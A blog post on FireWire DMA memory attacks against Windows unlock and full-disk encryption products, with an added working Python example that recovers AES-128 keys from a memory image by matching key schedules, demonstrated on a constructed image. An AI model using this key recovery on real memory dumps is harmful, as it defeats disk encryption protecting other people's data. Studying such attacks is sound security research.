I'm really enjoying the hype around the firewire hacks: originally presented by Maximillian Dornseif in 2004, given new life in 2006 by Adam Boileau, and now re-hyped in 2008 thanks to Adam releasing the last of his scripts to unlock a Windows machine (illegally! gosh). I think Adam sums it up quite nicely:
Yes, it's a FEATURE, not a bug. It's the Fire in Firewire. Yes, I know this, Microsoft know this. The OHCI-1394 spec knows this. People with firewire ports generally don't.
Now, owning Windows' unlock mechanism is good enough for a demo, and we all know that if you have physical access you can do lots of stuff. However, one of the key growth industries in security is providing more protection at the physical layer. Have a look at all the acquisitions and players in this space:
There are a lot of people spending a lot of money to make damn sure that you can't get at data if you have physical access. I've personally been involved in an evaluation of several of these products, and I can assure you they aren't cheap. Now, those clever boys at Princeton worked out that the right sort of hype would be to target these very products with their cold boot attacks. But here we have a cheaper and easier way to get at the same thing: read the memory over DMA while the machine is still on, keys and all, without any of those pesky controls getting in the way.

To be fair, many of these products provide anti-theft/theft-detection/theft-response controls, which include steps as drastic as automagically deleting the encryption keys. However, I can't see that being enabled without a hefty addition to your service desk and at least 'top secret' classified documents lounging about on your machine.
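Why a plain memory read is enough to undo these products: while an encrypted volume is mounted, its AES key sits in the driver's memory, and software AES implementations commonly keep the whole expanded key schedule there too. The block below is an added example (not the post's own code, nor any tool it links to) of the key-schedule search Halderman et al. describe in the Princeton cold boot paper: a 16-byte candidate at some offset is a key exactly when the 160 bytes after it are its own FIPS-197 expansion. It does not matter whether the image came from a cold boot or a 1394 DMA read; since a DMA read returns an exact copy of RAM, this version demands an exact match and skips the bit-error tolerance the Princeton tool needs for decayed DRAM. The memory image, its filler and the offsets are constructed for the example.

```python
"""Find an AES-128 key schedule in a memory image (Princeton-style key search).

Added example; not code from the post or from any tool it links to. A 16-byte
candidate at offset i is the key iff the 160 bytes after it equal its own
FIPS-197 expansion. The image below is constructed; its offsets are arbitrary.
"""
import random


def _xtime(b):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    return ((b << 1) ^ (0x1B if b & 0x80 else 0)) & 0xFF


def _gf_mul(a, b):
    """Full GF(2^8) multiplication, used only to build the S-box."""
    r = 0
    for _ in range(8):
        if b & 1:
            r ^= a
        a = _xtime(a)
        b >>= 1
    return r


def _build_sbox():
    """AES S-box: multiplicative inverse, then the fixed affine transform."""
    inv = [0] * 256
    for x in range(1, 256):
        if inv[x]:
            continue
        for y in range(1, 256):
            if _gf_mul(x, y) == 1:
                inv[x], inv[y] = y, x
                break
    sbox = []
    for x in range(256):
        b = inv[x]                      # inv[0] stays 0, which maps to 0x63 as required
        s = b
        for i in range(1, 5):           # s = b ^ rotl1(b) ^ rotl2(b) ^ rotl3(b) ^ rotl4(b)
            s ^= ((b << i) | (b >> (8 - i))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox


SBOX = _build_sbox()


def expand_key_128(key, rounds=10):
    """FIPS-197 key expansion for AES-128: returns (rounds + 1) * 16 bytes."""
    if len(key) != 16:
        raise ValueError("AES-128 key must be 16 bytes")
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 0x01
    for i in range(4, 4 * (rounds + 1)):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = t[1:] + t[:1]           # RotWord
            t = [SBOX[b] for b in t]    # SubWord
            t[0] ^= rcon                # Rcon[i/4]
            rcon = _xtime(rcon)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return bytes(b for word in w for b in word)


def find_aes128_keys(image):
    """Return (offset, key) wherever 16 bytes are followed by their own full schedule."""
    hits = []
    for off in range(len(image) - 176 + 1):
        cand = image[off:off + 16]
        # Cheap prefilter: expand one round and compare just the next 16 bytes.
        if expand_key_128(cand, rounds=1)[16:32] != image[off + 16:off + 32]:
            continue
        # Exact match of all 10 round keys; a DMA read gives an exact image,
        # so no bit-error tolerance is needed here (unlike decayed cold-boot RAM).
        if expand_key_128(cand) == image[off:off + 176]:
            hits.append((off, bytes(cand)))
    return hits


# Constructed sample image: 4 KiB of deterministic pseudo-random filler, the
# FIPS-197 A.1 test key's full schedule planted at SCHEDULE_OFFSET, and a decoy
# at DECOY_OFFSET (the bare 16 key bytes, no schedule) that must NOT be reported.
TEST_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")
SCHEDULE_OFFSET = 1000
DECOY_OFFSET = 3000


def build_sample_image():
    rng = random.Random(1394)
    buf = bytearray(rng.getrandbits(8) for _ in range(4096))
    buf[SCHEDULE_OFFSET:SCHEDULE_OFFSET + 176] = expand_key_128(TEST_KEY)
    buf[DECOY_OFFSET:DECOY_OFFSET + 16] = TEST_KEY
    return bytes(buf)


if __name__ == "__main__":
    for off, key in find_aes128_keys(build_sample_image()):
        print(f"AES-128 key schedule at offset 0x{off:x}: key {key.hex()}")
```

The decoy copy of the key is deliberately not reported: the search keys on the structure of the schedule, not on the key bytes themselves, which is what makes it work against a raw image with no knowledge of where the driver keeps its state. Against a real dump you would feed the whole image in and, for AES-256 or for implementations that store only the key, extend the check accordingly.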
As an aside, I would really like to see someone modify Black Dog to use this firewire attack vector: instead of 'autorunning' the X server, use DMA and the host's hardware to run it. This would allow you to 'hijack' the hardware of any machine you plug into, which could be a pretty cool feature: "Take your machine with you, leave the hardware".
Update: 'Twas only a matter of time: PointSec Disk Encryption Cracked via Firewire